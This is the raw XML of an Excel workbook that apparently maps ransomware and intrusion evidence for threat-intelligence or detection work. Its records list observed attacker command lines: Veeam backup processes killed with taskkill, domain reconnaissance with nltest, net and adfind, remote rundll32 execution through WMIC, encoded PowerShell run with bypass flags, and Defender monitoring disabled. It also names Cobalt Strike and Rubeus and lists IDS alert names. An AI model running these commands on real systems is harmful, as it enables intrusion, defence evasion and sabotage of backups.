veeam.backup.mountservice.exe /F&quot;_x000a_&quot;C:\Windows\System32\taskkill.exe&quot;&quot; /IM veeam.backup.service.exe /F&quot;_x000a_&quot;C:\Windows\System32\taskkill.exe&quot;&quot; /IM veeam.backup.uiserver.exe /F&quot;_x000a_&quot;C:\Windows\System32\taskkill.exe&quot;&quot; /IM veeam.backup.wmiserver.exe /F&quot;_x000a_&quot;C:\Windows\System32\taskkill.exe&quot;&quot; /IM veeamdeploymentsvc.exe /F&quot;_x000a_&quot;C:\Windows\System32\taskkill.exe&quot;&quot; /IM veeamfilesysvsssvc.exe /F&quot;_x000a_&quot;C:\Windows\System32\taskkill.exe&quot;&quot; /IM veeam.guest.interaction.proxy.exe /F&quot;_x000a_&quot;C:\Windows\System32\taskkill.exe&quot;&quot; /IM veeamnfssvc.exe /F&quot;_x000a_&quot;C:\Windows\System32\taskkill.exe&quot;&quot; /IM veeamtransportsvc.exe /F&quot;"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="492"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="&quot;C:\Windows\system32\taskmgr.exe&quot;&quot; /4&quot;"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="493"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="&quot;C:\Windows\system32\wbem\wmiprvse.exe -Embedding&quot;"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="494"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="&quot;C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding&quot;"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="495"/>
    <x v="0"/>
    <s v="etpro"/>
    <s v="2025194 ET INFO Observed Let's Encrypt Certificate for Suspicious TLD (.xyz)_x000a_2023882 ET INFO HTTP Request to a *.top domain_x000a_ET INFO Observed DNS Query for EmerDNS_TLD (.bazar)_x000a_ET NETBIOS DCERPC SVCCTL - Remote Service Control Manager Access"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="496"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /c echo 92d8cc45954 &gt;; \\.\pipe\446b3c"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="497"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="netlogon exploited"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="498"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C rundll32 C:\Windows\system32\SQL.dll, StartW"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="499"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="rundll32 C:\PerfLogs\arti64.dll, rundll"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="500"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="501"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /dclist:DOMAIN"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="502"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net group &quot;Domain admins&quot; /DOMAIN"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="503"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net group &quot;enterprise admins&quot; /domain"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="504"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="505"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /dclist:&quot;DOMAIN&quot;"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="506"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="ping DOMAINCONTROLLER"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="507"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="cmd.exe /C time"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="508"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net user administrator /domain"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="509"/>
    <x v="3"/>
    <s v="cmdline"/>
    <s v="powershell -nop -exec bypass -EncodedCommand"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="510"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem, LastLogonDate | Export-CSV C:\Users\AllWindows.csv -NoTypeInformation -Encoding UTF8"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="511"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot;"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="512"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot;"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="513"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot;"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="514"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -sc trustdmp"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="515"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet)"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="516"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;(objectcategory=group)&quot;"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="517"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="518"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="519"/>
    <x v="15"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C WMIC/node:&quot;DC.DOMAIN.local&quot; process call create &quot;cmd /c C:\PerfLogs\servisess.exe\&quot;"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="520"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="mmc.exe&quot; &quot;C:\Windows\System32\gpedit.msc&quot;"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="521"/>
    <x v="0"/>
    <s v="etpro"/>
    <s v="GPL NETBIOS SMB-DS IPC$ share access_x000a_ET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement_x000a_ET POLICY SMB2 NT Create AndX Request For an Executable File"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="522"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="523"/>
    <x v="24"/>
    <s v="htool"/>
    <s v="Rubeus"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="524"/>
    <x v="15"/>
    <s v="cmdline"/>
    <s v="WMIC /node:&quot;DC.example.domain&quot; process call create &quot;rundll32 C:\PerfLogs\arti64.dll, StartW&quot;"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="525"/>
    <x v="3"/>
    <s v="cmdline"/>
    <s v="powershell -nop -exec bypass -EncodedCommand"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="526"/>
    <x v="3"/>
    <s v="cmdline"/>
    <s v="Set-MpPreference -DisableRealtimeMonitoring $true"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="527"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="528"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net group &quot;Domain admins&quot; /DOMAIN"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="529"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="ping hostname.domain.local"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="530"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net view /all"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="531"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net view /all /domain"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="532"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="533"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net group &quot;Domain admins&quot; /DOMAIN"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="534"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net group &quot;enterprise admins&quot; /domain"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="535"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="cmd.exe /C reg query HKLM\System\CurrentControlSet\Control\Lsa\Kerbberos\Parameters"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="536"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /dclist:"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="537"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="Invoke-CheckLocalAdminAccess"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="538"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="Get-NetComputer -operatingsystem *server*"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="539"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="Get-NetSubnet"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="540"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="Find-LocalAdminAccess"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="541"/>
    <x v="15"/>
    <s v="cmdline"/>
    <s v="WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="542"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem, LastLogonDate | Export-CSV C:\Users\AllWindows.csv -NoTypeInformation -Encoding UTF8"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="543"/>
    <x v="15"/>
    <s v="cmdline"/>
    <s v="WMIC /node:\&quot;DC.example.domain\&quot; process call create \&quot;rundll32 C:\\PerfLogs\\arti64.dll, StartW\&quot;"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="544"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C dir \\Server\c$"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="545"/>
    <x v="15"/>
    <s v="sigma"/>
    <s v="Suspicious WMI Execution - 526be59f-a573-4eea-b5f7-f0973207634d"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <x v="546"/>
    <x v="0"/>
    <s v="etpro"/>
    <s v="ET INFO Observed DNS Query for EmerDNS_TLD (.bazar)_x000a_ETPRO POLICY Possibly Suspicious example.com SSL Cert_x000a_ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)_x000a_ETPRO TROJAN Observed Malicious SSL Cert (Cobalt Strike CnC)_x000a_Feodo Tracker: potential TrickBot CnC Traffic_detected_x000a_ET NETBIOS DCERPC SVCCTL - Remote Service Control Manager Access_x000a_ET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement_x000a_ET POLICY SMB2 NT Create AndX Request For an Executable File_x000a_ET POLICY SMB2 NT Create AndX Request For an Executable File In a Temp Directory_x000a_ET POLICY RunDll Request Over SMB - Likely Lateral Movement_x000a_GPL NETBIOS SMB-DS IPC$ share access_x000a_ET CNC Feodo Tracker Reported CnC Server TCP group 15_x000a_ET EXPLOIT Possible ETERNALBLUE Probe MS17-010 (Generic Flags)_x000a_ET EXPLOIT Possible ETERNALBLUE Probe MS17-010 (MSF style)_x000a_ET POLICY Command Shell Activity Over SMB - Possible Lateral Movement"/>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1C3F55-9B45-B04F-8A2F-9B3B47A6C66C}"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5" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="6">
    <pivotField dataField="1" showAll="0">
      <items count="5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t="default"/>
      </items>
    </pivotField>
    <pivotField dataField="1" showAll="0">
      <items count="35">
        <item x="20"/>
        <item x="33"/>
        <item x="26"/>
        <item x="9"/>
        <item x="10"/>
        <item x="29"/>
        <item x="11"/>
        <item x="12"/>
        <item x="1"/>
        <item x="14"/>
        <item x="4"/>
        <item x="21"/>
        <item x="17"/>
        <item x="7"/>
        <item x="27"/>
        <item x="31"/>
        <item x="16"/>
        <item x="25"/>
        <item x="22"/>
        <item x="3"/>
        <item x="18"/>
        <item x="19"/>
        <item x="2"/>
        <item x="30"/>
        <item x="24"/>
        <item x="28"/>
        <item x="13"/>
        <item x="23"/>
        <item x="15"/>
        <item x="8"/>
        <item x="6"/>
        <item x="32"/>
        <item x="5"/>
        <item x="0"/>
        <item t="default"/>
      </items>
    </pivotField>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField axis="axisRow" showAll="0">
      <items count="12">
        <item x="0"/>
        <item x="10"/>
        <item x="9"/>
        <item x="7"/>
        <item x="6"/>
        <item x="5"/>
        <item x="1"/>
        <item x="3"/>
        <item x="4"/>
        <item x="8"/>
        <item x="2"/>
        <item t="default"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="5"/>
  </rowFields>
  <rowItems count="12">
    <i>
      <x/>
    </i>
    <i>
      <x v="1"/>
    </i>
    <i>
      <x v="2"/>
    </i>
    <i>
      <x v="3"/>
    </i>
    <i>
      <x v="4"/>
    </i>
    <i>
      <x v="5"/>
    </i>
    <i>
      <x v="6"/>
    </i>
    <i>
      <x v="7"/>
    </i>
    <i>
      <x v="8"/>
    </i>
    <i>
      <x v="9"/>
    </i>
    <i>
      <x v="10"/>
    </i>
    <i t="grand">
      <x/>
    </i>
  </rowItems>
  <colFields count="1">
    <field x="-2"/>
  </colFields>
  <colItems count="2">
    <i>
      <x/>
    </i>
    <i i="1">
      <x v="1"/>
    </i>
  </colItems>
  <dataFields count="2">
    <dataField name="Count of map_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of 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889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:F548" totalsRowShown="0" dataDxfId="6">
  <autoFilter ref="A1:F548" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A14:F528">
    <sortCondition ref="A1:A548"/>
  </sortState>
  <tableColumns count="6">
    <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="5"/>
    <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="4"/>
    <tableColumn id="1" xr3:uid="{1ED6D649-59BA-E14C-BBA6-23BD7EBDEB94}" name="eid_type" dataDxfId="3"/>
    <tableColumn id="6" xr3:uid="{16A9BF58-E113-7848-AEB0-6F8A9E864CF3}" name="evidence" dataDxfId="2"/>
    <tableColumn id="2" xr3:uid="{794120D3-18F6-5949-81E6-52D88B752F29}" name="description" dataDxfId="1"/>
    <tableColumn id="5" xr3:uid="{85834C32-2D65-CD48-92FE-AB72134D121E}" name="ns_meta"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A5849-2682-F643-8842-EFF560F6FB5C}">
  <dimension ref="A1:F548"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A51" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="D384" sqref="D384:D442"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="15.1640625" customWidth="1"/>
    <col min="2" max="2" width="16.1640625" customWidth="1"/>
    <col min="3" max="3" width="13.6640625" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="134" customWidth="1"/>
    <col min="5" max="5" width="74.6640625" customWidth="1"/>
    <col min="6" max="6" width="123.1640625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A1" t="s">
        <v>0</v>
      </c>
      <c r="B1" t="s">
        <v>1</v>
      </c>
      <c r="C1" t="s">
        <v>4</v>
      </c>
      <c r="D1" t="s">
        <v>897</v>
      </c>
      <c r="E1" t="s">
        <v>2</v>
      </c>
      <c r="F1" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="2" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A2" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B2" s="1"/>
      <c r="C2" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>6</v>
      </c>
      <c r="E2" s="1"/>
      <c r="F2" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="3" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A3" s="1" t="s">
        <v>7</v>
      </c>
      <c r="B3" s="1"/>
      <c r="C3" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>8</v>
      </c>
      <c r="E3" s="1"/>
      <c r="F3" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="4" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A4" s="1" t="s">
        <v>9</v>
      </c>
      <c r="B4" s="1"/>
      <c r="C4" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>10</v>
      </c>
      <c r="E4" s="1"/>
      <c r="F4" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="5" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A5" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B5" s="1" t="s">
        <v>309</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>12</v>
      </c>
      <c r="E5" s="1"/>
      <c r="F5" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="6" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A6" s="1" t="s">
        <v>13</v>
      </c>
      <c r="B6" s="1" t="s">
        <v>309</v>
      </c>
      <c r="C6" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>14</v>
      </c>
      <c r="E6" s="1"/>
      <c r="F6" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="7" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A7" s="1" t="s">
        <v>15</v>
      </c>
      <c r="B7" s="1" t="s">
        <v>309</v>
      </c>
      <c r="C7" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>16</v>
      </c>
      <c r="E7" s="1"/>
      <c r="F7" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="8" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A8" s="1" t="s">
        <v>17</v>
      </c>
      <c r="B8" s="1" t="s">
        <v>309</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>18</v>
      </c>
      <c r="E8" s="1"/>
      <c r="F8" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="9" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A9" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B9" s="1" t="s">
        <v>322</v>
      </c>
      <c r="C9" s="1"/>
      <c r="D9" s="1" t="s">
        <v>20</v>
      </c>
      <c r="E9" s="1"/>
      <c r="F9" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="10" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A10" s="1" t="s">
        <v>21</v>
      </c>
      <c r="B10" s="1"/>
      <c r="C10" s="1" t="s">
        <v>291</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>22</v>
      </c>
      <c r="E10" s="1"/>
      <c r="F10" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="11" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A11" s="1" t="s">
        <v>23</v>
      </c>
      <c r="B11" s="1"/>
      <c r="C11" s="1" t="s">
        <v>291</v>
      </c>
      <c r="D11" s="1" t="s">
        <v>24</v>
      </c>
      <c r="E11" s="1"/>
      <c r="F11" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="12" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A12" s="1" t="s">
        <v>25</v>
      </c>
      <c r="B12" s="1"/>
      <c r="C12" s="1" t="s">
        <v>291</v>
      </c>
      <c r="D12" s="1" t="s">
        <v>26</v>
      </c>
      <c r="E12" s="1"/>
      <c r="F12" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="13" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A13" s="1" t="s">
        <v>27</v>
      </c>
      <c r="B13" s="1"/>
      <c r="C13" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D13" s="1" t="s">
        <v>28</v>
      </c>
      <c r="E13" s="1"/>
      <c r="F13" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="14" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A14" s="1" t="s">
        <v>29</v>
      </c>
      <c r="B14" s="1" t="s">
        <v>313</v>
      </c>
      <c r="C14" s="1"/>
      <c r="D14" s="1" t="s">
        <v>30</v>
      </c>
      <c r="E14" s="1"/>
      <c r="F14" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="15" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A15" s="1" t="s">
        <v>31</v>
      </c>
      <c r="B15" s="1" t="s">
        <v>322</v>
      </c>
      <c r="C15" s="1"/>
      <c r="D15" s="1" t="s">
        <v>324</v>
      </c>
      <c r="E15" s="1"/>
      <c r="F15" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="16" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A16" s="1" t="s">
        <v>32</v>
      </c>
      <c r="B16" s="1" t="s">
        <v>322</v>
      </c>
      <c r="C16" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D16" s="1" t="s">
        <v>33</v>
      </c>
      <c r="E16" s="1"/>
      <c r="F16" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="17" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A17" s="1" t="s">
        <v>34</v>
      </c>
      <c r="B17" s="1" t="s">
        <v>311</v>
      </c>
      <c r="C17" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D17" s="1" t="s">
        <v>35</v>
      </c>
      <c r="E17" s="1"/>
      <c r="F17" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="18" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A18" s="1" t="s">
        <v>36</v>
      </c>
      <c r="B18" s="1" t="s">
        <v>311</v>
      </c>
      <c r="C18" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D18" s="1" t="s">
        <v>37</v>
      </c>
      <c r="E18" s="1"/>
      <c r="F18" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="19" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A19" s="1" t="s">
        <v>38</v>
      </c>
      <c r="B19" s="1" t="s">
        <v>311</v>
      </c>
      <c r="C19" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D19" s="1" t="s">
        <v>287</v>
      </c>
      <c r="E19" s="1"/>
      <c r="F19" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="20" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A20" s="1" t="s">
        <v>39</v>
      </c>
      <c r="B20" s="1" t="s">
        <v>313</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>40</v>
      </c>
      <c r="E20" s="1"/>
      <c r="F20" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="21" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A21" s="1" t="s">
        <v>41</v>
      </c>
      <c r="B21" s="1" t="s">
        <v>313</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>42</v>
      </c>
      <c r="E21" s="1"/>
      <c r="F21" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="22" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A22" s="1" t="s">
        <v>43</v>
      </c>
      <c r="B22" s="1" t="s">
        <v>300</v>
      </c>
      <c r="C22" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D22" s="1" t="s">
        <v>44</v>
      </c>
      <c r="E22" s="1"/>
      <c r="F22" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="23" spans="1:6" ht="68" x14ac:dyDescent="0.2">
      <c r="A23" s="1" t="s">
        <v>45</v>
      </c>
      <c r="B23" s="1" t="s">
        <v>301</v>
      </c>
      <c r="C23" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>46</v>
      </c>
      <c r="E23" s="1"/>
      <c r="F23" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="24" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A24" s="1" t="s">
        <v>47</v>
      </c>
      <c r="B24" s="1" t="s">
        <v>317</v>
      </c>
      <c r="C24" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D24" s="1" t="s">
        <v>48</v>
      </c>
      <c r="E24" s="1"/>
      <c r="F24" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="25" spans="1:6" ht="68" x14ac:dyDescent="0.2">
      <c r="A25" s="1" t="s">
        <v>49</v>
      </c>
      <c r="B25" s="1" t="s">
        <v>302</v>
      </c>
      <c r="C25" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D25" s="1" t="s">
        <v>50</v>
      </c>
      <c r="E25" s="1"/>
      <c r="F25" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="26" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A26" s="1" t="s">
        <v>51</v>
      </c>
      <c r="B26" s="1" t="s">
        <v>305</v>
      </c>
      <c r="C26" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D26" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E26" s="1"/>
      <c r="F26" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="27" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A27" s="1" t="s">
        <v>53</v>
      </c>
      <c r="B27" s="1" t="s">
        <v>303</v>
      </c>
      <c r="C27" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D27" s="1" t="s">
        <v>54</v>
      </c>
      <c r="E27" s="1"/>
      <c r="F27" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="28" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A28" s="1" t="s">
        <v>55</v>
      </c>
      <c r="B28" s="1" t="s">
        <v>305</v>
      </c>
      <c r="C28" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D28" s="1" t="s">
        <v>56</v>
      </c>
      <c r="E28" s="1"/>
      <c r="F28" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="29" spans="1:6" ht="85" x14ac:dyDescent="0.2">
      <c r="A29" s="1" t="s">
        <v>57</v>
      </c>
      <c r="B29" s="1" t="s">
        <v>315</v>
      </c>
      <c r="C29" s="1" t="s">
        <v>290</v>
      </c>
      <c r="D29" s="1" t="s">
        <v>58</v>
      </c>
      <c r="E29" s="1"/>
      <c r="F29" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="30" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A30" s="1" t="s">
        <v>59</v>
      </c>
      <c r="B30" s="1" t="s">
        <v>308</v>
      </c>
      <c r="C30" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D30" s="1" t="s">
        <v>60</v>
      </c>
      <c r="E30" s="1"/>
      <c r="F30" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="31" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A31" s="1" t="s">
        <v>61</v>
      </c>
      <c r="B31" s="1" t="s">
        <v>308</v>
      </c>
      <c r="C31" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D31" s="1" t="s">
        <v>62</v>
      </c>
      <c r="E31" s="1"/>
      <c r="F31" s="1" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="32" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A32" s="1" t="s">
        <v>63</v>
      </c>
